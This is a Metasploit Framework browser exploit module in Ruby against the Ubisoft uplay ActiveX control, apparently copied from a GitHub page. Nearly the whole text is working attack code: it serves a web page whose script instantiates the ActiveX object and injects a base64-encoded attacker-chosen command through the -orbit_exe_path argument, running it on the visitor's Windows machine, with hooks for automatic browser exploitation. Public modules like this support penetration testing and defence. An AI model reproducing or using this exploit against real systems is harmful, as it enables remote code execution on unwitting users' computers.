Skip to content
Find file
Fetching contributors…
Cannot retrieve contributors at this time
100 lines (83 sloc) 3.02 KB
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,
:ua_name => HttpClients::IE,
:javascript => true,
:rank => NormalRanking,
:classid => "{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}", #Asume this is so javascript can check the ActiveX is available?
:method => "DownloadImageFileURL", #??
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Ubisoft uplay Active X Control Arbitrary Code Execution',
'Description' => %q{
The uplay ActiveX component allows an attacker to execute any command line action.
User must sign in, unless auto-sign in is enabled and uplay must not already be running.
Tested in Win XP, does not appear to work in Win7.
Fixed as of 2.04 Mon 20th July.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tavis Ormandy <taviso[at]cmpxchg8b.com>', # Initial discovery
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
'phillips321 <phillips321[at]phillips321.co.uk>',
'Richard Hicks <scriptmonkeyblog[at]gmail.com>'
],
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://seclists.org/fulldisclosure/2012/Jul/375']
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 29 2012'))
register_options(
[
OptString.new('COMMAND', [ true, "The command to execute on the remote host.", "calc.exe"])
], self.class)
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
url = "http://"
url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
if datastore['COMMAND'].length > 693
print_status "Command too long must be < 694 characters"
return
end
cmd = Rex::Text.encode_base64(datastore['COMMAND'])
classid = "clsid:1c492e6a-2803-5ed7-83e1-1b1d4d41eb39"
type = "application/x-uplaypc" # Unused but alternative to classid
content = "<html><body><script>x = document.createElement('OBJECT');x.classid='#{classid}';document.body.appendChild(x);x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play');</script></body></html>"
print_status("Sending exploit HTML")
send_response_html(cli, content)
handler(cli)
end
end
Something went wrong with that request. Please try again.